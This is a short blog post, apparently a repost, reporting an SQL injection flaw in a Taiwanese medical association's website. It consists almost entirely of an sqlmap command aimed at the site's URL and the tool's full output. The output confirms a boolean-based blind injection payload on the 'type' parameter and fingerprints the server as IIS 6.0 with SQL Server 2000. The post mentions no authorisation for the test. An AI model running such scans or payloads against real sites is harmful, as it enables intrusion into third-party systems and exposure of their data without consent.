
SQL injection vulnerability in a Taiwanese medical association's website

Date: 2016-06-13 20:40:26


Going straight to the trusty sqlmap:

PS C:\security tools\sqlmap-master> python.exe .\sqlmap.py -u "http://www.xxx.org.tw/people/edu.asp?type=6"
         _
 ___ ___| |_____ ___ ___  {1.0.5.46#dev}
|_ -| . | |     | .| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end users responsibility to obey all ap
d federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 20:17:12

[20:17:12] [INFO] testing connection to the target URL
[20:17:12] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[20:17:13] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS/IDS
do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N] y
[20:17:15] [WARNING] dropping timeout to 10 seconds (i.e. --timeout=10)
[20:17:15] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
[20:17:15] [WARNING] WAF/IDS/IPS product hasnt been identified (generic protection response)
[20:17:15] [INFO] testing if the target URL is stable
[20:17:16] [INFO] target URL is stable
[20:17:16] [INFO] testing if GET parameter type is dynamic
[20:17:17] [INFO] confirming that GET parameter type is dynamic
[20:17:17] [INFO] GET parameter type is dynamic
[20:17:17] [INFO] heuristic (basic) test shows that GET parameter type might be injectable (possible DBMS: Microsoft SQL Server)
[20:17:17] [INFO] testing for SQL injection on GET parameter type
it looks like the back-end DBMS is Microsoft SQL Server. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for Microsoft SQL Server extending provided level (1) and risk (1) values? [Y/n] 1
[20:17:25] [INFO] testing AND boolean-based blind - WHERE or HAVING clause
[20:17:27] [INFO] GET parameter type seems to be AND boolean-based blind - WHERE or HAVING clause injectable
[20:17:27] [INFO] testing Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
[20:17:27] [INFO] testing Microsoft SQL Server/Sybase inline queries
[20:17:27] [INFO] testing Microsoft SQL Server/Sybase stacked queries (comment)
[20:17:27] [WARNING] time-based comparison requires larger statistical model, please wait................... (done)
[20:17:40] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option --time-sec as possible (e
[20:17:40] [INFO] testing Microsoft SQL Server/Sybase time-based blind
[20:17:43] [INFO] testing Generic UNION query (NULL) - 1 to 20 columns
[20:17:43] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:17:45] [INFO] checking if the injection point on GET parameter type is a false positive
[20:17:48] [WARNING] it appears that the character > is filtered by the back-end server. You are strongly advised to rerun with the --tamper=between
GET parameter type is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 57 HTTP(s) requests:
---
Parameter: type (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: type=6 AND 9449=9449
---
[20:18:04] [INFO] testing Microsoft SQL Server
[20:18:04] [INFO] confirming Microsoft SQL Server
[20:18:05] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[20:18:05] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 8 times, 404 (Not Found) - 27 times

 


Original article: http://www.cnblogs.com/janepeak/p/5581959.html
